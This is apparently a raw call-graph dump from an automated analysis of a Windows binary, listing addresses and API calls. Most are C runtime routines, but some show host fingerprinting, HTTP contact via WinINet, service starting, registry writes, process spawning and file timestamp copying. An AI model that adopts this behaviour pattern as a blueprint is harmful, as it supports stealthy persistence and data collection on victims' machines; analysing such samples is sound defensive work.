10982 26169f 10961->10982 10963 25e966 FindHandlerForForeignException 38 API calls 10962->10963 10962->10964 10963->10964 10986 2675c9 10964->10986 10990 25c7f5 10965->10990 10971 261367 10968->10971 10970 25d381 10970->10927 10970->10938 10972 261373 ___DestructExceptionObject 10971->10972 10973 25f698 _abort EnterCriticalSection 10972->10973 10974 261381 10973->10974 10975 2613b5 _abort LeaveCriticalSection 10974->10975 10976 2613a8 ___DestructExceptionObject 10975->10976 10976->10970 10977->10950 10978->10953 10980 25e966 FindHandlerForForeignException 38 API calls 10979->10980 10981 2614db 10980->10981 10981->10960 10983 2616a5 10982->10983 10985 26166e 10982->10985 10989 25f6e0 LeaveCriticalSection 10983->10989 10985->10958 10985->10962 10985->10964 10987 257097 TranslatorGuardHandler 5 API calls 10986->10987 10988 2675d4 10987->10988 10988->10988 10989->10985 10991 25c801 FindHandlerForForeignException 10990->10991 10992 25c819 10991->10992 10993 25c94f _abort GetModuleHandleW 10991->10993 11012 25f698 EnterCriticalSection 10992->11012 10995 25c80d 10993->10995 10995->10992 11024 25c993 GetModuleHandleExW 10995->11024 10999 25c8dc 11016 25c90e 10999->11016 11000 25c908 11003 2675c9 _abort 5 API calls 11000->11003 11009 25c90d 11003->11009 11004 25c741 _abort 5 API calls 11010 25c8ae 11004->11010 11005 25c741 _abort 5 API calls 11011 25c8bf 11005->11011 11006 25c821 11008 25c896 11006->11008 11006->11011 11032 25cf53 11006->11032 11008->11004 11008->11010 11010->11005 11013 25c8ff 11011->11013 11012->11006 11014 25f6e0 _abort LeaveCriticalSection 11013->11014 11015 25c8d8 11014->11015 11015->10999 11015->11000 11017 25d96b _abort 10 API calls 11016->11017 11018 25c918 11017->11018 11019 25c93c 11018->11019 11020 25c91c GetPEB 11018->11020 11022 25c993 _abort 8 API calls 11019->11022 11020->11019 11021 25c92c GetCurrentProcess TerminateProcess 11020->11021 11021->11019 11023 25c944 ExitProcess 11022->11023 11025 25c9e0 11024->11025 11026 25c9bd GetProcAddress 11024->11026 11027 25c9e6 FreeLibrary 11025->11027 11028 25c9ef 11025->11028 11030 25c9d2 11026->11030 11027->11028 11029 257097 TranslatorGuardHandler 5 API calls 11028->11029 11031 25c9f9 11029->11031 11030->11025 11031->10992 11033 25cc8c _abort 20 API calls 11032->11033 11034 25cf6a 11033->11034 11034->11008 11035->10895 11039 25f6e0 LeaveCriticalSection 11036->11039 11038 260135 11038->10895 11039->11038 11041 25a9d9 11040->11041 11047 25a9cf 11040->11047 11042 25e966 FindHandlerForForeignException 38 API calls 11041->11042 11041->11047 11043 25a9fa 11042->11043 11048 25eab5 11043->11048 11047->10900 11047->10901 11049 25aa13 11048->11049 11050 25eac8 11048->11050 11052 25eae2 11049->11052 11050->11049 11056 26113d 11050->11056 11053 25eaf5 11052->11053 11054 25eb0a 11052->11054 11053->11054 11055 26009d __cftof 38 API calls 11053->11055 11054->11047 11055->11054 11057 261149 ___DestructExceptionObject 11056->11057 11058 25e966 FindHandlerForForeignException 38 API calls 11057->11058 11059 261152 11058->11059 11060 2611a0 ___DestructExceptionObject 11059->11060 11068 25f698 EnterCriticalSection 11059->11068 11060->11049 11062 261170 11069 2611b4 11062->11069 11067 25d37c _abort 38 API calls 11067->11060 11068->11062 11070 2611c2 __cftof 11069->11070 11072 261184 11069->11072 11071 260ef0 __cftof 20 API calls 11070->11071 11070->11072 11071->11072 11073 2611a3 11072->11073 11074 25f6e0 _abort LeaveCriticalSection 11073->11074 11075 261197 11074->11075 11075->11060 11075->11067 11077 25fece 11076->11077 11083 25fe24 11076->11083 11080 257097 TranslatorGuardHandler 5 API calls 11077->11080 11082 25ff7a 11080->11082 11082->10918 11086 260d36 11083->11086 11085 2629f5 43 API calls 11085->11077 11087 25a9bc __cftof 38 API calls 11086->11087 11088 260d56 MultiByteToWideChar 11087->11088 11090 260d94 11088->11090 11098 260e2c 11088->11098 11093 25d32e __onexit 21 API calls 11090->11093 11095 260db5 __alloca_probe_16 ___scrt_fastfail 11090->11095 11091 257097 TranslatorGuardHandler 5 API calls 11094 25fe85 11091->11094 11092 260e26 11105 260e53 11092->11105 11093->11095 11100 2629f5 11094->11100 11095->11092 11097 260dfa MultiByteToWideChar 11095->11097 11097->11092 11099 260e16 GetStringTypeW 11097->11099 11098->11091 11099->11092 11101 25a9bc __cftof 38 API calls 11100->11101 11102 262a08 11101->11102 11109 2627d8 11102->11109 11106 260e70 11105->11106 11107 260e5f 11105->11107 11106->11098 11107->11106 11108 25d2f4 _free 20 API calls 11107->11108 11108->11106 11110 2627f3 11109->11110 11111 262819 MultiByteToWideChar 11110->11111 11112 262843 11111->11112 11113 2629cd 11111->11113 11116 25d32e __onexit 21 API calls 11112->11116 11118 262864 __alloca_probe_16 11112->11118 11114 257097 TranslatorGuardHandler 5 API calls 11113->11114 11115 25fea6 11114->11115 11115->11085 11116->11118 11117 2628ad MultiByteToWideChar 11119 2628c6 11117->11119 11131 262919 11117->11131 11118->11117 11118->11131 11136 25d80a 11119->11136 11121 260e53 __freea 20 API calls 11121->11113 11123 2628f0 11126 25d80a 11 API calls 11123->11126 11123->11131 11124 262928 11127 25d32e __onexit 21 API calls 11124->11127 11132 262949 __alloca_probe_16 11124->11132 11125 2629be 11129 260e53 __freea 20 API calls 11125->11129 11126->11131 11127->11132 11128 25d80a 11 API calls 11130 26299d 11128->11130 11129->11131 11130->11125 11133 2629ac WideCharToMultiByte 11130->11133 11131->11121 11132->11125 11132->11128 11133->11125 11134 2629ec 11133->11134 11135 260e53 __freea 20 API calls 11134->11135 11135->11131 11137 25d4c2 FindHandlerForForeignException 5 API calls 11136->11137 11138 25d831 11137->11138 11139 25d892 10 API calls 11138->11139 11141 25d83a 11138->11141 11140 25d87a LCMapStringW 11139->11140 11140->11141 11142 257097 TranslatorGuardHandler 5 API calls 11141->11142 11143 25d88c 11142->11143 11143->11123 11143->11124 11143->11131 11145 25fbb1 ___DestructExceptionObject 11144->11145 11152 25f698 EnterCriticalSection 11145->11152 11147 25fbbb 11153 25fc10 11147->11153 11151 25fbd4 ___DestructExceptionObject 11151->10923 11152->11147 11165 260330 11153->11165 11155 25fc5e 11156 260330 26 API calls 11155->11156 11157 25fc7a 11156->11157 11158 260330 26 API calls 11157->11158 11159 25fc98 11158->11159 11160 25fbc8 11159->11160 11161 25d2f4 _free 20 API calls 11159->11161 11162 25fbdc 11160->11162 11161->11160 11179 25f6e0 LeaveCriticalSection 11162->11179 11164 25fbe6 11164->11151 11166 260341 11165->11166 11175 26033d 11165->11175 11167 26035b ___scrt_fastfail 11166->11167 11168 260348 11166->11168 11172 260392 11167->11172 11173 260389 11167->11173 11167->11175 11169 25d495 __dosmaperr 20 API calls 11168->11169 11170 26034d 11169->11170 11171 25ba52 __cftof 26 API calls 11170->11171 11171->11175 11172->11175 11176 25d495 __dosmaperr 20 API calls 11172->11176 11174 25d495 __dosmaperr 20 API calls 11173->11174 11177 26038e 11174->11177 11175->11155 11176->11177 11178 25ba52 __cftof 26 API calls 11177->11178 11178->11175 11179->11164 11181 25bacd 11180->11181 11182 25babf 11180->11182 11183 25d495 __dosmaperr 20 API calls 11181->11183 11182->11181 11186 25bae4 11182->11186 11184 25bad5 11183->11184 11185 25ba52 __cftof 26 API calls 11184->11185 11187 25badf 11185->11187 11186->11187 11188 25d495 __dosmaperr 20 API calls 11186->11188 11187->10843 11188->11184 11193 25c5d5 11189->11193 11194 25c59f 11189->11194 11190 25c5ec 11192 25d2f4 _free 20 API calls 11190->11192 11191 25d2f4 _free 20 API calls 11191->11193 11192->11194 11193->11190 11193->11191 11194->10844 11196 256770 ___scrt_initialize_default_local_stdio_options ___scrt_fastfail 11195->11196 11316 25b854 11196->11316 11198 256887 11200 257097 TranslatorGuardHandler 5 API calls 11198->11200 11199 2567be ___scrt_fastfail 11199->11198 11319 256080 11199->11319 11201 256895 11200->11201 11201->10571 11203 25680c ___scrt_fastfail 11329 2563a0 11203->11329 11208 2562c6 ___scrt_fastfail 11207->11208 11209 2562dc GetModuleFileNameW wsprintfW 11208->11209 11809 2596c0 11209->11809 11211 25631f CreateProcessW 11212 25637c WaitForSingleObject 11211->11212 11213 25638a 11211->11213 11212->11213 11214 257097 TranslatorGuardHandler 5 API calls 11213->11214 11215 256394 11214->11215 11215->10547 11217 2596c0 ___scrt_fastfail 11216->11217 11218 2568c6 GetSystemDirectoryA 11217->11218 11219 2568ee ___scrt_fastfail 11218->11219 11220 253d30 50 API calls 11219->11220 11221 256906 CreateFileA 11220->11221 11222 25693a FindCloseChangeNotification DeleteFileA 11221->11222 11223 25692a 11221->11223 11225 257097 TranslatorGuardHandler 5 API calls 11222->11225 11224 257097 TranslatorGuardHandler 5 API calls 11223->11224 11226 256936 11224->11226 11227 25695a 11225->11227 11226->10542 11227->10542 11811 256160 CreateFileA 11228->11811 11230 256744 11231 257097 TranslatorGuardHandler 5 API calls 11230->11231 11233 256753 11231->11233 11232 256658 LocalFree 11232->11230 11233->10550 11235 256642 ___scrt_fastfail 11235->11230 11235->11232 11236 2566b4 LocalAlloc 11235->11236 11237 2566d4 11236->11237 11820 254560 11237->11820 11241 256703 11241->11232 11242 25670e LocalFree 11241->11242 11244 257097 TranslatorGuardHandler 5 API calls 11242->11244 11245 256739 11244->11245 11245->10550 11247 25590b new 11246->11247 11847 255a50 RegOpenKeyExA 11247->11847 11249 25591e 11250 255931 ___std_exception_copy 11249->11250 11253 255955 ___std_exception_copy ___scrt_fastfail 11249->11253 11854 255180 11250->11854 11260 255980 GetSystemDirectoryA 11253->11260 11254 255945 11257 257097 TranslatorGuardHandler 5 API calls 11254->11257 11255 2559b3 11256 257097 TranslatorGuardHandler 5 API calls 11255->11256 11258 2559c1 11256->11258 11259 255951 11257->11259 11258->10552 11259->10552 11261 254ae0 11 API calls 11260->11261 11262 25599c 11261->11262 11262->11255 11263 2559a1 11262->11263 11264 257097 TranslatorGuardHandler 5 API calls 11263->11264 11265 2559af 11264->11265 11265->10552 11267 255c87 CloseHandle 11266->11267 11268 255c70 CreateFileA 11266->11268 11267->10554 11268->11267 11269 255c94 11268->11269 11269->10554 11271 25626e WriteFile 11270->11271 11272 25628a 11270->11272 11273 256284 CloseHandle 11271->11273 11274 256292 FindCloseChangeNotification 11271->11274 11272->10556 11273->11272 11274->10556 11993 254880 11275->11993 11277 255dc4 11278 255dcb 11277->11278 12008 255ca0 11277->12008 11278->10558 11280 255dea 11280->11278 11281 256240 4 API calls 11280->11281 11282 255dfd 11281->11282 11282->10558 11284 255c26 11283->11284 11285 255b4b ___scrt_fastfail 11283->11285 11286 257097 TranslatorGuardHandler 5 API calls 11284->11286 11288 255b5e GetSystemDirectoryA 11285->11288 11287 255c32 11286->11287 11287->10560 11289 255b80 11288->11289 11289->11289 11290 255b8a CreateFileA 11289->11290 11291 255be2 GetFileTime SetFileTime CloseHandle CloseHandle 11290->11291 11292 255bcb CloseHandle 11290->11292 11291->11284 11293 257097 TranslatorGuardHandler 5 API calls 11292->11293 11294 255bde 11293->11294 11294->10560 12039 256e80 RegOpenKeyExA 11295->12039 11298 257067 OpenServiceA 11300 25708c CloseServiceHandle 11298->11300 11301 25707a StartServiceA CloseServiceHandle 11298->11301 11299 256b49 Sleep 11302 254ae0 OpenSCManagerA 11299->11302 11300->11299 11301->11300 11303 254b06 OpenServiceA 11302->11303 11304 254b1d 11302->11304 11305 254b16 CloseServiceHandle 11303->11305 11306 254b2f QueryServiceStatusEx CloseServiceHandle CloseServiceHandle 11303->11306 11307 257097 TranslatorGuardHandler 5 API calls 11304->11307 11305->11304 11309 257097 TranslatorGuardHandler 5 API calls 11306->11309 11308 254b2b 11307->11308 11308->10566 11310 254b6b 11309->11310 11310->10566 11312 255a0d RegSetValueExA 11311->11312 11313 255a2f 11311->11313 11314 255a35 RegCloseKey 11312->11314 11315 255a29 RegCloseKey 11312->11315 11313->10568 11314->10568 11315->11313 11362 25a563 11316->11362 11320 2560b4 ___scrt_fastfail 11319->11320 11756 255f70 11320->11756 11322 2560ee 11771 255e20 WSAStartup 11322->11771 11327 257097 TranslatorGuardHandler 5 API calls 11328 25615b 11327->11328 11328->11203 11330 2563b7 ___scrt_fastfail 11329->11330 11331 25bab2 ___std_exception_copy 26 API calls 11330->11331 11332 2563c7 ___scrt_fastfail 11331->11332 11333 25bab2 ___std_exception_copy 26 API calls 11332->11333 11334 2563e8 11333->11334 11798 25be70 11334->11798 11337 256450 11338 256474 InternetCloseHandle 11337->11338 11339 256477 11337->11339 11338->11339 11340 256481 11339->11340 11341 25647e InternetCloseHandle 11339->11341 11342 256488 InternetCloseHandle 11340->11342 11343 25648b InternetOpenA 11340->11343 11341->11340 11342->11343 11344 2564e3 InternetConnectA 11343->11344 11345 2564ce 11343->11345 11344->11345 11346 256509 HttpOpenRequestA 11344->11346 11347 257097 TranslatorGuardHandler 5 API calls 11345->11347 11346->11345 11349 25652c 11346->11349 11348 2564dd 11347->11348 11348->11198 11350 256535 InternetSetOptionA 11349->11350 11351 25654b HttpSendRequestA 11349->11351 11350->11351 11351->11345 11354 256564 11351->11354 11352 25659f HttpQueryInfoA 11355 25be70 42 API calls 11352->11355 11354->11352 11356 256583 InternetReadFile 11354->11356 11357 2565ef 11355->11357 11356->11352 11356->11354 11802 256410 11357->11802 11360 257097 TranslatorGuardHandler 5 API calls 11361 25660a 11360->11361 11361->11198 11363 25a5a3 11362->11363 11364 25a58b 11362->11364 11363->11364 11366 25a5ab 11363->11366 11365 25d495 __dosmaperr 20 API calls 11364->11365 11367 25a590 11365->11367 11368 25a9bc __cftof 38 API calls 11366->11368 11369 25ba52 __cftof 26 API calls 11367->11369 11370 25a5bb 11368->11370 11377 25a59b 11369->11377 11379 25a987 11370->11379 11371 257097 TranslatorGuardHandler 5 API calls 11373 25a6bf 11371->11373 11373->11199 11377->11371 11380 25a9a6 11379->11380 11381 25d495 __dosmaperr 20 API calls 11380->11381 11382 25a633 11381->11382 11383 25abbe 11382->11383 11399 25b6bd 11383->11399 11385 25a63e 11396 25aa3f 11385->11396 11386 25abe3 11387 25d495 __dosmaperr 20 API calls 11386->11387 11388 25abe8 11387->11388 11389 25ba52 __cftof 26 API calls 11388->11389 11389->11385 11390 25abce 11390->11385 11390->11386 11406 25ad17 11390->11406 11414 25b181 11390->11414 11419 25adc1 11390->11419 11424 25ade9 11390->11424 11453 25af52 11390->11453 11397 25d2f4 _free 20 API calls 11396->11397 11398 25aa4f 11397->11398 11398->11377 11400 25b6d5 11399->11400 11401 25b6c2 11399->11401 11400->11390 11402 25d495 __dosmaperr 20 API calls 11401->11402 11403 25b6c7 11402->11403 11404 25ba52 __cftof 26 API calls 11403->11404 11405 25b6d2 11404->11405 11405->11390 11475 25ad36 11406->11475 11408 25ad1c 11409 25ad33 11408->11409 11410 25d495 __dosmaperr 20 API calls 11408->11410 11409->11390 11411 25ad25 11410->11411 11412 25ba52 __cftof 26 API calls 11411->11412 11413 25ad30 11412->11413 11413->11390 11415 25b187 11414->11415 11416 25b191 11414->11416 11484 25ab62 11415->11484 11416->11390 11420 25adc7 11419->11420 11422 25add1 11419->11422 11421 25ab62 42 API calls 11420->11421 11423 25add0 11421->11423 11422->11390 11423->11390 11425 25adf0 11424->11425 11426 25ae0a 11424->11426 11428 25ae3a 11425->11428 11429 25afd6 11425->11429 11430 25af6a 11425->11430 11427 25d495 __dosmaperr 20 API calls 11426->11427 11426->11428 11431 25ae26 11427->11431 11428->11390 11433 25afdd 11429->11433 11434 25b01c 11429->11434 11441 25afae 11429->11441 11430->11441 11444 25af77 11430->11444 11432 25ba52 __cftof 26 API calls 11431->11432 11436 25ae31 11432->11436 11437 25af85 11433->11437 11438 25afe2 11433->11438 11550 25b632 11434->11550 11436->11390 11450 25af93 11437->11450 11452 25afa7 11437->11452 11542 25b26b 11437->11542 11438->11441 11443 25afe7 11438->11443 11441->11450 11441->11452 11536 25b455 11441->11536 11442 25afbd 11442->11452 11522 25b3c5 11442->11522 11445 25afec 11443->11445 11446 25affa 11443->11446 11444->11437 11444->11442 11444->11450 11445->11452 11526 25b613 11445->11526 11530 25b59f 11446->11530 11450->11452 11553 25b71a 11450->11553 11452->11390 11454 25afd6 11453->11454 11455 25af6a 11453->11455 11456 25afdd 11454->11456 11457 25b01c 11454->11457 11464 25afae 11454->11464 11455->11464 11466 25af77 11455->11466 11458 25af85 11456->11458 11459 25afe2 11456->11459 11460 25b632 26 API calls 11457->11460 11462 25b26b 48 API calls 11458->11462 11473 25af93 11458->11473 11474 25afa7 11458->11474 11463 25afe7 11459->11463 11459->11464 11460->11473 11461 25b455 26 API calls 11461->11473 11462->11473 11467 25afec 11463->11467 11468 25affa 11463->11468 11464->11461 11464->11473 11464->11474 11465 25afbd 11470 25b3c5 40 API calls 11465->11470 11465->11474 11466->11458 11466->11465 11466->11473 11471 25b613 26 API calls 11467->11471 11467->11474 11469 25b59f 26 API calls 11468->11469 11469->11473 11470->11473 11471->11473 11472 25b71a 40 API calls 11472->11474 11473->11472 11473->11474 11474->11390 11478 25ad60 11475->11478 11477 25ad42 11477->11408 11479 25adb6 11478->11479 11480 25ad82 11478->11480 11479->11477 11480->11479 11481 25d495 __dosmaperr 20 API calls 11480->11481 11482 25adab 11481->11482 11483 25ba52 __cftof 26 API calls 11482->11483 11483->11479 11487 25e098 11484->11487 11488 25e0b3 11487->11488 11491 25bbc3 11488->11491 11492 25b6bd 26 API calls 11491->11492 11494 25bbd5 11492->11494 11493 25bc10 11496 25a9bc __cftof 38 API calls 11493->11496 11494->11493 11495 25bbea 11494->11495 11508 25ab89 11494->11508 11497 25d495 __dosmaperr 20 API calls 11495->11497 11501 25bc1c 11496->11501 11498 25bbef 11497->11498 11500 25ba52 __cftof 26 API calls 11498->11500 11500->11508 11502 25bc4b 11501->11502 11509 25be3d 11501->11509 11505 25bcb7 11502->11505 11516 25bdeb 11502->11516 11503 25bdeb 26 API calls 11506 25bd7e 11503->11506 11505->11503 11507 25d495 __dosmaperr 20 API calls 11506->11507 11506->11508 11507->11508 11508->11390 11510 25be5f 11509->11510 11511 25be49 11509->11511 11513 25be13 38 API calls 11510->11513 11511->11510 11512 25be51 11511->11512 11514 25f585 42 API calls 11512->11514 11515 25be5d 11513->11515 11514->11515 11515->11501 11517 25be0f 11516->11517 11518 25bdfb 11516->11518 11517->11505 11518->11517 11519 25d495 __dosmaperr 20 API calls 11518->11519 11520 25be04 11519->11520 11521 25ba52 __cftof 26 API calls 11520->11521 11521->11517 11523 25b3dd 11522->11523 11524 25b412 11523->11524 11559 25e2f9 11523->11559 11524->11450 11527 25b61f 11526->11527 11528 25b455 26 API calls 11527->11528 11529 25b631 11528->11529 11529->11450 11531 25b5b4 11530->11531 11532 25d495 __dosmaperr 20 API calls 11531->11532 11535 25b5c8 11531->11535 11533 25b5bd 11532->11533 11534 25ba52 __cftof 26 API calls 11533->11534 11534->11535 11535->11450 11537 25b466 11536->11537 11538 25d495 __dosmaperr 20 API calls 11537->11538 11541 25b490 11537->11541 11539 25b485 11538->11539 11540 25ba52 __cftof 26 API calls 11539->11540 11540->11541 11541->11450 11543 25b281 11542->11543 11581 25a6f7 11543->11581 11545 25b2c8 11591 25f3da 11545->11591 11549 25b361 11549->11450 11551 25b455 26 API calls 11550->11551 11552 25b649 11551->11552 11552->11450 11554 25b78c 11553->11554 11555 25b737 11553->11555 11556 257097 TranslatorGuardHandler 5 API calls 11554->11556 11555->11554 11557 25e2f9 __cftof 40 API calls 11555->11557 11558 25b7bb 11556->11558 11557->11555 11558->11452 11562 25e1d8 11559->11562 11563 25e1ec 11562->11563 11564 25e211 11563->11564 11565 25e222 11563->11565 11575 25e1f0 11563->11575 11567 25d495 __dosmaperr 20 API calls 11564->11567 11566 25a9bc __cftof 38 API calls 11565->11566 11568 25e22d 11566->11568 11569 25e216 11567->11569 11570 25e297 WideCharToMultiByte 11568->11570 11571 25e23a 11568->11571 11572 25ba52 __cftof 26 API calls 11569->11572 11573 25e2c7 GetLastError 11570->11573 11574 25e248 ___scrt_fastfail 11570->11574 11571->11574 11576 25e27e ___scrt_fastfail 11571->11576 11572->11575 11573->11574 11573->11576 11574->11575 11577 25d495 __dosmaperr 20 API calls 11574->11577 11575->11524 11576->11575 11578 25d495 __dosmaperr 20 API calls 11576->11578 11577->11575 11579 25e2ea 11578->11579 11580 25ba52 __cftof 26 API calls 11579->11580 11580->11575 11582 25a713 11581->11582 11585 25a722 11581->11585 11583 25d495 __dosmaperr 20 API calls 11582->11583 11584 25a718 11583->11584 11584->11545 11585->11584 11586 25d32e __onexit 21 API calls 11585->11586 11587 25a749 11586->11587 11588 25a760 11587->11588 11623 25aa59 11587->11623 11589 25d2f4 _free 20 API calls 11588->11589 11589->11584 11592 25f400 11591->11592 11593 25f3ea 11591->11593 11595 25f414 11592->11595 11602 25f42a 11592->11602 11594 25d495 __dosmaperr 20 API calls 11593->11594 11596 25f3ef 11594->11596 11597 25d495 __dosmaperr 20 API calls 11595->11597 11598 25ba52 __cftof 26 API calls 11596->11598 11599 25f419 11597->11599 11601 25b342 11598->11601 11600 25ba52 __cftof 26 API calls 11599->11600 11600->11601 11601->11549 11616 25ab06 11601->11616 11604 25f486 11602->11604 11605 25f464 11602->11605 11603 25f4a4 11608 25f503 11603->11608 11609 25f4cd 11603->11609 11604->11603 11606 25f4a9 11604->11606 11626 25f2ae 11605->11626 11636 25eb99 11606->11636 11664 25ee9c 11608->11664 11611 25f4d2 11609->11611 11612 25f4eb 11609->11612 11647 25f1e6 11611->11647 11657 25f082 11612->11657 11739 25e068 11616->11739 11618 25ab18 11619 25ab2c 11618->11619 11743 25deba 11618->11743 11621 25e068 46 API calls 11619->11621 11622 25ab35 11621->11622 11622->11549 11624 25d2f4 _free 20 API calls 11623->11624 11625 25aa68 11624->11625 11625->11588 11627 25f2d4 11626->11627 11630 25f2e9 11626->11630 11628 257097 TranslatorGuardHandler 5 API calls 11627->11628 11629 25f2e5 11628->11629 11629->11601 11631 25bab2 ___std_exception_copy 26 API calls 11630->11631 11632 25f38c 11631->11632 11632->11627 11633 25f399 11632->11633 11634 25ba7f __cftof 11 API calls 11633->11634 11635 25f3a5 11634->11635 11637 25ebad 11636->11637 11638 25a9bc __cftof 38 API calls 11637->11638 11639 25ebbf 11638->11639 11640 25ebc7 11639->11640 11641 25ebdb 11639->11641 11642 25d495 __dosmaperr 20 API calls 11640->11642 11644 25ee9c 40 API calls 11641->11644 11646 25ebd6 __alldvrm ___scrt_fastfail _strrchr 11641->11646 11643 25ebcc 11642->11643 11645 25ba52 __cftof 26 API calls 11643->11645 11644->11646 11645->11646 11646->11601 11671 262fde 11647->11671 11651 25f246 11652 25f24d 11651->11652 11653 25f28b 11651->11653 11655 25f265 11651->11655 11652->11601 11725 25ef37 11653->11725 11722 25f10f 11655->11722 11658 262fde 28 API calls 11657->11658 11659 25f0af 11658->11659 11660 262a40 26 API calls 11659->11660 11661 25f0e7 11660->11661 11662 25f0ee 11661->11662 11663 25f10f 38 API calls 11661->11663 11662->11601 11663->11662 11665 262fde 28 API calls 11664->11665 11666 25eec4 11665->11666 11667 262a40 26 API calls 11666->11667 11668 25ef09 11667->11668 11669 25ef10 11668->11669 11670 25ef37 38 API calls 11668->11670 11669->11601 11670->11669 11675 263013 11671->11675 11672 26304f 11673 25bab2 ___std_exception_copy 26 API calls 11672->11673 11674 26433f 11673->11674 11676 26436d 11674->11676 11681 264317 11674->11681 11675->11672 11680 2630a2 11675->11680 11677 25ba7f __cftof 11 API calls 11676->11677 11679 264379 11677->11679 11678 257097 TranslatorGuardHandler 5 API calls 11682 25f214 11678->11682 11683 2650b0 22 API calls 11680->11683 11681->11678 11713 262a40 11682->11713 11684 26311f 11683->11684 11685 2651c0 __floor_pentium4 22 API calls 11684->11685 11686 263129 11685->11686 11688 263429 11686->11688 11689 263390 11686->11689 11692 2631ae 11686->11692 11687 2635a7 ___scrt_fastfail 11694 260330 26 API calls 11687->11694 11688->11687 11690 260330 26 API calls 11688->11690 11689->11688 11691 260330 26 API calls 11689->11691 11690->11687 11691->11688 11693 260330 26 API calls 11692->11693 11698 263242 11692->11698 11693->11698 11695 263388 11694->11695 11710 263805 ___scrt_fastfail 11695->11710 11712 263c68 ___scrt_fastfail 11695->11712 11696 260330 26 API calls 11696->11695 11697 2640ff 11699 262b30 26 API calls 11697->11699 11698->11696 11704 26414b 11699->11704 11700 263c56 11700->11697 11703 260330 26 API calls 11700->11703 11701 263b88 11701->11700 11702 260330 26 API calls 11701->11702 11702->11700 11703->11697 11705 260330 26 API calls 11704->11705 11711 2641b2 11704->11711 11705->11711 11706 260330 26 API calls 11706->11712 11707 262b30 26 API calls 11707->11711 11708 260330 26 API calls 11708->11711 11709 260330 26 API calls 11709->11710 11710->11701 11710->11709 11711->11681 11711->11707 11711->11708 11712->11701 11712->11706 11714 262a4d 11713->11714 11717 262a63 11713->11717 11715 25d495 __dosmaperr 20 API calls 11714->11715 11721 262a5c CallUnexpected 11714->11721 11716 262a52 11715->11716 11718 25ba52 __cftof 26 API calls 11716->11718 11717->11714 11719 262a7f 11717->11719 11718->11721 11720 25d495 __dosmaperr 20 API calls 11719->11720 11720->11716 11721->11651 11723 25a9bc __cftof 38 API calls 11722->11723 11724 25f125 ___scrt_fastfail 11723->11724 11724->11652 11726 25ef48 11725->11726 11727 25ef56 11726->11727 11728 25ef6d 11726->11728 11729 25d495 __dosmaperr 20 API calls 11727->11729 11730 25a9bc __cftof 38 API calls 11728->11730 11731 25ef5b 11729->11731 11734 25ef79 11730->11734 11732 25ba52 __cftof 26 API calls 11731->11732 11733 25ef65 11732->11733 11733->11652 11735 25bab2 ___std_exception_copy 26 API calls 11734->11735 11738 25eff7 CallUnexpected 11735->11738 11736 25ba7f __cftof 11 API calls 11737 25f081 11736->11737 11738->11736 11740 25e076 11739->11740 11742 25e080 11739->11742 11748 25e04e 11740->11748 11742->11618 11744 25ded6 11743->11744 11745 25dec8 11743->11745 11744->11618 11751 25de82 11745->11751 11749 25dee7 46 API calls 11748->11749 11750 25e063 11749->11750 11750->11742 11752 25a9bc __cftof 38 API calls 11751->11752 11753 25de95 11752->11753 11754 25be3d 42 API calls 11753->11754 11755 25dea3 11754->11755 11755->11618 11787 267710 11756->11787 11759 255fa4 GetAdaptersInfo 11760 256064 11759->11760 11764 255fca 11759->11764 11761 257097 TranslatorGuardHandler 5 API calls 11760->11761 11762 256072 11761->11762 11762->11322 11763 256029 11765 253d30 50 API calls 11763->11765 11764->11763 11766 25600c 11764->11766 11765->11760 11767 253d30 50 API calls 11766->11767 11768 256017 11767->11768 11769 257097 TranslatorGuardHandler 5 API calls 11768->11769 11770 256025 11769->11770 11770->11322 11774 255e56 ___scrt_fastfail 11771->11774 11781 255f4e 11771->11781 11772 257097 TranslatorGuardHandler 5 API calls 11773 255f5e gethostname GetTickCount 11772->11773 11783 253d30 11773->11783 11775 255e7b gethostname gethostbyname 11774->11775 11780 255ea7 11775->11780 11775->11781 11776 255ec7 inet_ntoa 11789 25bb0c 11776->11789 11778 255f37 11779 25bab2 ___std_exception_copy 26 API calls 11778->11779 11779->11781 11780->11776 11780->11778 11782 25bb0c 26 API calls 11780->11782 11781->11772 11782->11780 11784 253d49 ___scrt_initialize_default_local_stdio_options 11783->11784 11785 25b854 50 API calls 11784->11785 11786 253d57 11785->11786 11786->11327 11788 255f7d WSAStartup 11787->11788 11788->11759 11788->11760 11790 25bb28 11789->11790 11793 25bb1a 11789->11793 11791 25d495 __dosmaperr 20 API calls 11790->11791 11792 25bb30 11791->11792 11794 25ba52 __cftof 26 API calls 11792->11794 11793->11790 11796 25bb51 11793->11796 11795 25bb3a 11794->11795 11795->11780 11796->11795 11797 25d495 __dosmaperr 20 API calls 11796->11797 11797->11792 11799 25be89 11798->11799 11800 25bbc3 42 API calls 11799->11800 11801 2563f2 11800->11801 11801->11337 11803 256420 InternetCloseHandle 11802->11803 11804 256423 11802->11804 11803->11804 11805 25642d 11804->11805 11806 25642a InternetCloseHandle 11804->11806 11807 256434 InternetCloseHandle 11805->11807 11808 256437 11805->11808 11806->11805 11807->11808 11808->11360 11810 2596d7 11809->11810 11810->11211 11810->11810 11812 2561c4 11811->11812 11813 25618c GetFileSizeEx LocalAlloc 11811->11813 11812->11235 11814 2561cd 11813->11814 11815 2561bd CloseHandle 11813->11815 11818 2561e0 ReadFile 11814->11818 11819 256209 11814->11819 11815->11812 11816 256211 CloseHandle LocalFree 11816->11235 11817 25622b FindCloseChangeNotification 11817->11235 11818->11814 11818->11819 11819->11816 11819->11817 11825 2545b8 11820->11825 11821 25464c 11822 257097 TranslatorGuardHandler 5 API calls 11821->11822 11823 25465d 11822->11823 11827 25d1bf 11823->11827 11824 253d30 50 API calls 11824->11825 11825->11821 11825->11824 11826 254641 lstrcpyA 11825->11826 11826->11821 11828 25d1ef 11827->11828 11829 25d1cd 11827->11829 11837 25d207 11828->11837 11829->11828 11831 25d1d2 11829->11831 11833 25d495 __dosmaperr 20 API calls 11831->11833 11832 25d202 11832->11241 11834 25d1d7 11833->11834 11835 25ba52 __cftof 26 API calls 11834->11835 11836 25d1e2 11835->11836 11836->11241 11838 25a9bc __cftof 38 API calls 11837->11838 11839 25d21d 11838->11839 11840 25d22b 11839->11840 11846 25d242 11839->11846 11841 25d495 __dosmaperr 20 API calls 11840->11841 11842 25d230 11841->11842 11843 25ba52 __cftof 26 API calls 11842->11843 11844 25d23b 11843->11844 11844->11832 11845 25e04e 46 API calls 11845->11846 11846->11844 11846->11845 11848 255a82 RegQueryValueExA 11847->11848 11849 255a7c 11847->11849 11848->11849 11850 255aae ___scrt_fastfail 11848->11850 11849->11249 11850->11849 11851 255aca RegQueryValueExA 11850->11851 11851->11849 11852 255aea 11851->11852 11852->11849 11853 